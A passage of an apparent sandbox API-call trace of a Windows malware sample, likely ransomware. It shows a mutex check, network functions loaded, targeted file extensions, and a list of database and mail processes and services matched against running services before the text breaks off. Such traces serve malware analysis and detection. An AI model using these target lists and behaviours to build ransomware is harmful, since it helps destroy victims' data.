0x73222f06 [0239.896] GetProcAddress (hModule=0x73220000, lpProcName="WNetEnumResourceW") returned 0x73223058 [0239.896] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76fd0000 [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="WSAStartup") returned 0x76fd3ab2 [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="socket") returned 0x76fd3eb8 [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="send") returned 0x76fd6f01 [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="recv") returned 0x76fd6b0e [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="connect") returned 0x76fd6bdd [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="closesocket") returned 0x76fd3918 [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="gethostbyname") returned 0x76fe7673 [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="inet_addr") returned 0x76fd311b [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="ntohl") returned 0x76fd2d57 [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="htonl") returned 0x76fd2d57 [0239.924] GetProcAddress (hModule=0x76fd0000, lpProcName="htons") returned 0x76fd2d8b [0239.924] GetProcessHeap () returned 0xb00000 [0239.924] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x20) returned 0xb5cde8 [0239.925] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd24 | out: lpPerformanceCount=0x18fd24*=7158641846) returned 1 [0239.925] GetTickCount () returned 0x6db0 [0239.925] GetCurrentProcessId () returned 0x55c [0239.925] GetTickCount () returned 0x6db0 [0239.925] GetTickCount () returned 0x6db0 [0239.925] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x20) returned 0xb5ce10 [0239.925] GetVersion () returned 0x1db10106 [0239.925] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x7) returned 0xb5a1d8 [0239.925] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb10ce0 [0239.925] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb10ce0, Size=0x20) returned 0xb5ce60 [0239.925] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5ce60, Size=0x40) returned 0xb5c9b8 [0239.925] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xb5d468 [0239.925] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_ZD24L0A") returned 0x0 [0239.925] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_ZD24L0A") returned 0x84 [0239.926] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5a1d8 | out: hHeap=0xb00000) returned 1 [0239.926] lstrlenW (lpString="Global\\syncronize_") returned 18 [0239.926] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5c9b8 | out: hHeap=0xb00000) returned 1 [0239.926] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x7) returned 0xb5a1d8 [0239.926] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb10ce0 [0239.926] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb10ce0, Size=0x20) returned 0xb5ce60 [0239.926] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5ce60, Size=0x40) returned 0xb5c9b8 [0239.926] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xb6d470 [0239.926] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_ZD24L0U") returned 0x0 [0239.926] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_ZD24L0U") returned 0x88 [0239.926] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5a1d8 | out: hHeap=0xb00000) returned 1 [0239.926] lstrlenW (lpString="Global\\syncronize_") returned 18 [0239.926] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5c9b8 | out: hHeap=0xb00000) returned 1 [0239.926] GetVersion () returned 0x1db10106 [0239.926] GetCurrentProcess () returned 0xffffffff [0239.926] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fd10 | out: TokenHandle=0x18fd10*=0x8c) returned 1 [0239.926] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fd0c, TokenInformationLength=0x4, ReturnLength=0x18fd18 | out: TokenInformation=0x18fd0c, ReturnLength=0x18fd18) returned 1 [0239.926] CloseHandle (hObject=0x8c) returned 1 [0239.926] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0 [0239.926] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x14) returned 0xb59ee8 [0239.926] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb10ce0 [0239.926] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb10ce0, Size=0x20) returned 0xb5ce60 [0239.926] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5ce60, Size=0x40) returned 0xb5c9b8 [0239.926] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5c9b8, Size=0x80) returned 0xb5c9b8 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5c9b8, Size=0x100) returned 0xb5c9b8 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x34) returned 0xb5cac0 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb5a1d8 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb5cb00 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb5cb10 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb10ce0 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb5cb20 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb10cf8 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cb20, Size=0x8) returned 0xb5cb20 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb10d10 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cb20, Size=0x10) returned 0xb5cb20 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb10d28 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb10d40 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cb20, Size=0x20) returned 0xb5cb20 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d490 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d4a8 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5a1d8, Size=0x8) returned 0xb5a1d8 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cb00, Size=0x8) returned 0xb5cb00 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb5cb48 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d4c0 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb5cb58 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d4d8 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cb58, Size=0x8) returned 0xb5cb58 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d4f0 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cb58, Size=0x10) returned 0xb5cb58 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d508 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb5cb70 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cb58, Size=0x20) returned 0xb5cb80 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5a1d8, Size=0x10) returned 0xb5a1d8 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cb00, Size=0x10) returned 0xb5cb58 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb5cb00 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d520 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb5cba8 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d538 [0239.927] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cba8, Size=0x8) returned 0xb5cba8 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb5cbb8 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d550 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb5cbc8 [0239.927] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d568 [0239.928] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cbc8, Size=0x8) returned 0xb5cbc8 [0239.928] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5a1d8, Size=0x20) returned 0xb5cbd8 [0239.928] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5cb58, Size=0x20) returned 0xb5cc00 [0239.928] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb5cb58 [0239.928] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d580 [0239.928] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb5a1d8 [0239.928] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb7d598 [0239.928] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5a1d8, Size=0x8) returned 0xb5a1d8 [0239.928] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x14) returned 0xb7d878 [0239.928] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x14) returned 0xb7d898 [0239.928] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0239.928] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5c9b8 | out: hHeap=0xb00000) returned 1 [0239.928] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fd5c | out: lpWSAData=0x18fd5c) returned 0 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5c8 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5c8, Size=0x20) returned 0xb5d068 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d068, Size=0x40) returned 0xb81aa8 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81aa8, Size=0x80) returned 0xb81aa8 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81aa8, Size=0x100) returned 0xb81aa8 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5c8 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5c8, Size=0x20) returned 0xb5d068 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d068, Size=0x40) returned 0xb81bb0 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81bb0, Size=0x80) returned 0xb81bb0 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81bb0, Size=0x100) returned 0xb81bb0 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d5c8 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb81cd0 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81cd0, Size=0x8) returned 0xb81ce0 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x14) returned 0xb820b8 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81ce0, Size=0x10) returned 0xb7d5f8 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x18) returned 0xb820d8 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1a) returned 0xb5d068 [0239.969] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5f8, Size=0x20) returned 0xb5d090 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1c) returned 0xb5d0b8 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x16) returned 0xb820f8 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1a) returned 0xb5d0e0 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb7d5f8 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb81ce0 [0239.969] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x40) returned 0xb82118 [0239.970] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81ce0, Size=0x8) returned 0xb81cd0 [0239.970] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x3c) returned 0xb82160 [0239.970] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81cd0, Size=0x10) returned 0xb7d610 [0239.970] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x14) returned 0xb821a8 [0239.970] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x18) returned 0xb821c8 [0239.970] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb5d108 [0239.970] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x24) returned 0xb821e8 [0239.970] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0239.970] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb81aa8 | out: hHeap=0xb00000) returned 1 [0239.970] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0239.970] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb81bb0 | out: hHeap=0xb00000) returned 1 [0239.970] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb841f0 [0239.982] EnumServicesStatusExW (in: hSCManager=0xb841f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18fcf8, lpServicesReturned=0x18fd10, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18fcf8, lpServicesReturned=0x18fd10, lpResumeHandle=0x0) returned 0 [0239.983] GetLastError () returned 0xea [0239.983] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa08) returned 0xb86038 [0239.983] EnumServicesStatusExW (in: hSCManager=0xb841f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb86038, cbBufSize=0xa08, pcbBytesNeeded=0x18fcf8, lpServicesReturned=0x18fd10, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb86038, pcbBytesNeeded=0x18fcf8, lpServicesReturned=0x18fd10, lpResumeHandle=0x0) returned 1 [0239.983] CloseServiceHandle (hSCObject=0xb841f0) returned 1 [0240.057] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0240.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0240.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0240.057] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0240.057] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0240.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0240.057] lstrlenW (lpString="AudioSrv") returned 8 [0240.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0240.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0240.057] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0240.057] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0240.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0240.057] lstrlenW (lpString="BFE") returned 3 [0240.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0240.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0240.057] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0240.057] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0240.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0240.057] lstrlenW (lpString="CscService") returned 10 [0240.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0240.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0240.057] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0240.057] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0240.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0240.057] lstrlenW (lpString="DcomLaunch") returned 10 [0240.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0240.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0240.057] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0240.057] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0240.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0240.057] lstrlenW (lpString="Dhcp") returned 4 [0240.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0240.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0240.058] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0240.058] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0240.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0240.058] lstrlenW (lpString="Dnscache") returned 8 [0240.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0240.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0240.058] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0240.058] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0240.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0240.058] lstrlenW (lpString="eventlog") returned 8 [0240.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0240.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0240.058] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0240.058] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0240.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0240.058] lstrlenW (lpString="EventSystem") returned 11 [0240.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0240.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0240.058] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0240.058] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0240.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0240.058] lstrlenW (lpString="gpsvc") returned 5 [0240.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0240.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0240.058] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0240.058] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0240.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0240.058] lstrlenW (lpString="lmhosts") returned 7 [0240.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0240.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0240.058] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0240.058] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0240.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0240.058] lstrlenW (lpString="MMCSS") returned 5 [0240.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0240.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0240.059] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0240.059] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0240.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0240.059] lstrlenW (lpString="nsi") returned 3 [0240.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0240.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0240.059] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0240.059] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0240.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0240.059] lstrlenW (lpString="PlugPlay") returned 8 [0240.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0240.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0240.059] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0240.059] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0240.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0240.059] lstrlenW (lpString="Power") returned 5 [0240.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0240.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0240.059] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0240.059] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0240.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0240.059] lstrlenW (lpString="ProfSvc") returned 7 [0240.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0240.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0240.059] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0240.059] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0240.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0240.059] lstrlenW (lpString="RpcEptMapper") returned 12 [0240.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0240.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0240.059] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0240.059] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0240.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0240.059] lstrlenW (lpString="RpcSs") returned 5 [0240.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0240.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0240.060] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0240.060] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0240.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0240.060] lstrlenW (lpString="SamSs") returned 5 [0240.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0240.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0240.060] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0240.060] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0240.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0240.060] lstrlenW (lpString="Schedule") returned 8 [0240.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0240.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0240.060] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0240.060] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0240.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0240.060] lstrlenW (lpString="SENS") returned 4 [0240.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0240.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0240.060] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0240.060] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0240.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0240.060] lstrlenW (lpString="ShellHWDetection") returned 16 [0240.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0240.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0240.060] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0240.060] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0240.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0240.060] lstrlenW (lpString="Spooler") returned 7 [0240.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0240.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0240.060] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0240.060] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0240.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0240.060] lstrlenW (lpString="Themes") returned 6 [0240.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0240.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 